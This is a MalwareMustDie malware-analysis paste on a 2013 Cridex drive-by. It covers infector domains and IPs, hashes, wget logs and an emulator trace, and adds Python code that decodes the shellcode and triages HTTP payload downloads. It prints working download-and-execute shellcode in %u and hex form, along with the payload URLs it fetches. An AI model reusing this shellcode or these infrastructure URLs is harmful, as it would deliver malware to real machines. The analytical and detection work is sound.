MalwareMustDie

#MalwareMustDie - New Cridex Payload Mar 12 2013

Mar 11th, 2013
#MalwareMustDie!
#Case .ru:8080/*/column.php infection
# Referer: http://pastebin.com/4WxSgjk7
# Infector: gimikalno.ru at 66.249.23.64, 94.102.14.239, 5.9.40.136
# @unixfreaxjp ~]$ date
# Tue Mar 12 02:44:53 JST 2013
# payload malware binary snapshots I put:
http://urlquery.net/report.php?id=1373504
http://urlquery.net/report.php?id=1373509
http://urlquery.net/report.php?id=1373512
http://urlquery.net/report.php?id=1373517

#Virus Total:

URL: https://www.virustotal.com/en/file/b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642/analysis/1363023004/
SHA256: b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642
SHA1: 656ade98396bc2f671ad7344d179b791b2bece05
MD5: 93a104caf7b01de69614498de5cf870a
File size: 104.0 KB ( 106496 bytes )
File name: info.exe
File type: Win32 EXE
Detection ratio: 2 / 45
Analysis date: 2013-03-11 17:30:04 UTC ( 0 minutes ago )


// DNS

gimikalno・ru
origin = ns1・gimikalno・ru
mail addr = root・gimikalno・ru
serial = 2012010101
refresh = 604800
retry = 1800
expire = 1800
minimum = 60

domain: GIMIKALNO・RU
nserver: ns1・gimikalno・ru・ 41・168・5・140
nserver: ns2・gimikalno・ru・ 110・164・58・250
nserver: ns3・gimikalno・ru・ 210・71・250・131
nserver: ns4・gimikalno・ru・ 194・249・217・8
nserver: ns5・gimikalno・ru・ 72・251・206・90
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client・naunet・ru/c/whoiscontact
created: 2013・03・03
paid-till: 2014・03・03
free-date: 2014・04・03
source: TCI
Last updated on 2013・03・11 20:56:36 MSK

// landing page:

--2013-03-12 02:16:24-- h00p://gimikalno・ru:8080/forum/links/column・php
Resolving gimikalno・ru・・・ seconds 0・00, 5・9・40・136, 66・249・23・64, 94・102・14・239
Caching gimikalno・ru => 5・9・40・136 66・249・23・64 94・102・14・239
Connecting to gimikalno・ru|5・9・40・136|:8080・・・ seconds 0・00, connected・
:
GET /forum/links/column・php HTTP/1・0
Referer: http://malwaremustdie・org-you-stupid-moronz
Host: gimikalno・ru:8080
HTTP request sent, awaiting response・・・
:
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Mon, 11 Mar 2013 17:15:23 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `column・php'
2013-03-12 02:16:29 (50・1 KB/s) - `column・php' saved [156642]

// shellcode:

%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ce9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u414f%u4145%u4943%u4644%u0647%u5d5a%u1012%u1018%u0718%u474e%u5d5a%u0745%u4144%u4346%u075b%u474b%u5d44%u4645%u5806%u5840%u4017%u154e%u5f1a%u1912%u1244%u4419%u1a12%u125e%u4e19%u510e%u154d%u5e1a%u1912%u1243%u4519%u1b12%u121a%u1b1b%u1912%u1243%u4319%u1b12%u1219%u4219%u1912%u0e47%u155b%u4319%u5c0e%u154c%u0e5a%u4250%u4e15%u2828

41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81
e9 0c fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07
58 40 5c 5c 58 12 07 07 4f 41 45 41 43 49 44 46
47 06 5a 5d 12 10 18 10 18 07 4e 47 5a 5d 45 07
44 41 46 43 5b 07 4b 47 44 5d 45 46 06 58 40 58
17 40 4e 15 1a 5f 12 19 44 12 19 44 12 1a 5e 12
19 4e 0e 51 4d 15 1a 5e 12 19 43 12 19 45 12 1b
1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 12 19 42
12 19 47 0e 5b 15 19 43 0e 5c 4c 15 5a 0e 50 42
15 4e 28 28

// shellcode translate・・・

0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
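The two dumps above are the same bytes: each %uXXXX is one little-endian 16-bit word, so %u8366 is the byte pair 66 83. The first 32 bytes are a plain single-byte XOR decoder: `66 81 e9 0c fe` sets cx to 0 - 0xfe0c = 0x1f4 (500 bytes, exactly the length of what follows), `80 30 28` XORs one byte at [eax] with 0x28, `e2 fa` loops, and the `call`/`pop eax` pair hands the address of the encoded body to the loop. The Python below is an added example, not part of the paste or of any MalwareMustDie tooling: it decodes the %u form, reads the key and count out of the stub, and recovers the URL that the emulator trace shows being passed to URLDownloadToFileA, without executing anything. The stub-locating heuristic is written for this sample's layout (xor byte [eax], imm8 followed by a backward call onto pop eax) and is my assumption for other samples.

```python
import re
import struct

# %u-encoded shellcode exactly as it appears on this page (copied verbatim).
SHELLCODE_U = "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ce9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u414f%u4145%u4943%u4644%u0647%u5d5a%u1012%u1018%u0718%u474e%u5d5a%u0745%u4144%u4346%u075b%u474b%u5d44%u4645%u5806%u5840%u4017%u154e%u5f1a%u1912%u1244%u4419%u1a12%u125e%u4e19%u510e%u154d%u5e1a%u1912%u1243%u4519%u1b12%u121a%u1b1b%u1912%u1243%u4319%u1b12%u1219%u4219%u1912%u0e47%u155b%u4319%u5c0e%u154c%u0e5a%u4250%u4e15%u2828"


def decode_percent_u(text):
    """Convert the %uXXXX heap-spray encoding into raw bytes.
    Each token is a 16-bit little-endian word: %u8366 -> b'\\x66\\x83'."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", text)
    return b"".join(struct.pack("<H", int(w, 16)) for w in words)


def find_xor_decoder(sc):
    """Return (key, count, body_offset) for a stub shaped like this sample's:
      66 81 e9 LL HH   sub cx, imm16   -> loop count is (0 - imm16) & 0xffff
      80 30 KK         xor byte [eax], KK
      e8 <rel32<0>     call back onto 'pop eax' (0x58); body starts right after the call
    Heuristic (assumption): other decoders will need their own pattern."""
    i = sc.find(b"\x80\x30")
    if i < 0 or i + 2 >= len(sc):
        raise ValueError("no 'xor byte [eax], imm8' found")
    key = sc[i + 2]
    j = sc.find(b"\x66\x81\xe9")
    if j < 0 or j + 5 > len(sc):
        raise ValueError("no 'sub cx, imm16' found")
    count = (-struct.unpack_from("<H", sc, j + 3)[0]) & 0xFFFF
    k = i
    while True:
        k = sc.find(b"\xe8", k + 1)
        if k < 0 or k + 5 > len(sc):
            raise ValueError("no backward call onto pop eax found")
        rel = struct.unpack_from("<i", sc, k + 1)[0]
        target = k + 5 + rel
        if rel < 0 and 0 <= target < len(sc) and sc[target] == 0x58:
            return key, count, k + 5


def xor_decode(sc):
    """Apply the stub's own key to the bytes the stub would decode; returns (key, decoded)."""
    key, count, off = find_xor_decoder(sc)
    return key, bytes(b ^ key for b in sc[off:off + count])


def ascii_strings(buf, min_len=4):
    """Printable-ASCII runs of at least min_len bytes, as str."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, buf)]


def embedded_url(decoded):
    """The NUL-terminated http:// string carried in the decoded body, or None."""
    i = decoded.find(b"http://")
    if i < 0:
        return None
    end = decoded.find(b"\x00", i)
    return decoded[i:end if end >= 0 else None].decode("ascii", "replace")


if __name__ == "__main__":
    sc = decode_percent_u(SHELLCODE_U)
    key, body = xor_decode(sc)
    print(f"{len(sc)} bytes total, xor key 0x{key:02x}, {len(body)} bytes decoded")
    print("download URL:", embedded_url(body))
    for s in ascii_strings(body):
        print("  string:", s)
```

The URL is the only long contiguous string in the decoded body; "urlmon", "wpbt0.dll" and "regsvr32 -s " are written into memory a dword at a time (push imm32 / mov dword [esp+x], imm32), so they only surface as fragments such as "wpbt", ".dll", "vr32" and " -s " in a strings pass, which is why an emulator trace like the one above is still the quickest way to see the final WinExec command line.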

// cracked payload download urls:

h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
h00p://66・249・23・64:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
h00p://94・102・14・239:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
h00p://5・9・40・136:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f

// payload download log:

--2013-03-12 02:24:28-- h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
Resolving gimikalno・ru・・・ seconds 0・00, 94・102・14・239, 5・9・40・136, 66・249・23・64
Caching gimikalno・ru => 94・102・14・239 5・9・40・136 66・249・23・64
Connecting to gimikalno・ru|94・102・14・239|:8080・・・ seconds 0・00, connected・
:
GET /forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f HTTP/1・0
Host: gimikalno・ru:8080
HTTP request sent, awaiting response・・・
:
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Mon, 11 Mar 2013 17:28:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Pragma: public
Expires: Mon, 11 Mar 2013 17:24:21 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info・exe"
Content-Transfer-Encoding: binary
Content-Length: 106496
:
200 OK
Registered socket 1892 for persistent reuse・
Length: 106496 (104K) [application/x-msdownload]
Saving to: `info・exe'
2013-03-12 02:24:31 (56・1 KB/s) - `info・exe' saved [106496/106496]
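The same script that served the HTML landing page hands out the executable once the shellcode's query string is present, and the response headers carry the tells: application/x-msdownload from a .php URL with a query string, a Content-Disposition name (info.exe) that has nothing to do with the URL (column.php), port 8080, and an Expires that predates the Date header (the server does not want the payload cached). The Python below is an added example, not part of the paste or of MalwareMustDie's own tooling: a triage function over request/response header pairs of the kind a proxy log or a wget -S run gives you, applied to the two exchanges above (reconstructed inline with the defanging removed). The "three signals" threshold is my assumption; some legitimate download scripts will also score, so treat it as a prioritisation rule, not a block rule.

```python
import posixpath
import re
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

# Constructed sample input: the landing-page fetch and the payload fetch from this page,
# request line + request headers, blank line, status line + response headers.
LANDING = """\
GET /forum/links/column.php HTTP/1.0
Host: gimikalno.ru:8080

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 11 Mar 2013 17:15:23 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
"""

PAYLOAD = """\
GET /forum/links/column.php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f HTTP/1.0
Host: gimikalno.ru:8080

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 11 Mar 2013 17:28:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Mon, 11 Mar 2013 17:24:21 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 106496
"""

# Content types under which Windows executables are commonly pushed (assumption: extend to taste).
EXE_TYPES = {"application/x-msdownload", "application/x-dosexec", "application/octet-stream"}


def parse_exchange(text):
    """Split an exchange into (request line, request headers, status line, response headers).
    Header names are lower-cased; repeated names (Cache-Control above) keep every value."""
    req_part, _, resp_part = text.partition("\n\n")
    req_lines, resp_lines = req_part.splitlines(), resp_part.splitlines()

    def headers(lines):
        h = {}
        for line in lines:
            if ":" in line:
                name, _, value = line.partition(":")
                h.setdefault(name.strip().lower(), []).append(value.strip())
        return h

    return req_lines[0], headers(req_lines[1:]), resp_lines[0], headers(resp_lines[1:])


def triage(text, min_signals=3):
    """Score one exchange; returns {'flagged': bool, 'reasons': [...]}.
    Only executable bodies are scored; everything else is left alone."""
    req_line, req_h, _status, resp_h = parse_exchange(text)
    _method, target, _version = req_line.split(" ", 2)
    url = urlsplit(target)
    host = req_h.get("host", [""])[0]
    port = int(host.rsplit(":", 1)[1]) if ":" in host else 80
    ctype = resp_h.get("content-type", [""])[0].split(";")[0].strip().lower()
    m = re.search(r'filename="?([^";]+)"?', resp_h.get("content-disposition", [""])[0])
    fname = m.group(1) if m else ""
    reasons = []
    if not (ctype in EXE_TYPES or fname.lower().endswith(".exe")):
        return {"flagged": False, "reasons": reasons}
    reasons.append(f"executable body ({ctype or 'no content-type'}, filename={fname or '-'})")
    if url.path.lower().endswith(".php"):
        reasons.append("served by a PHP script rather than a static file")
    if url.query:
        reasons.append("query string selects the payload")
    if fname and posixpath.basename(url.path) != fname:
        reasons.append(f"Content-Disposition name {fname!r} differs from URL basename {posixpath.basename(url.path)!r}")
    if port not in (80, 443):
        reasons.append(f"non-standard port {port}")
    try:  # Expires older than Date: the dispenser does not want this body cached or re-fetched
        if parsedate_to_datetime(resp_h["expires"][0]) < parsedate_to_datetime(resp_h["date"][0]):
            reasons.append("Expires predates Date (one-shot, do-not-cache dispenser)")
    except (KeyError, ValueError, TypeError):
        pass
    return {"flagged": len(reasons) >= min_signals, "reasons": reasons}


if __name__ == "__main__":
    for name, exchange in (("landing", LANDING), ("payload", PAYLOAD)):
        result = triage(exchange)
        print(name, "flagged" if result["flagged"] else "clean")
        for r in result["reasons"]:
            print("   -", r)
```

Running it leaves the landing page untouched (text/html is not scored at all) and flags the payload fetch on all six signals; the ones that survive trivial attacker changes are the script-plus-query-string shape and the name mismatch, since the content type, port and cache headers are the first things a kit operator rotates.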

---
#MalwareMustDie! @unixfreaxjp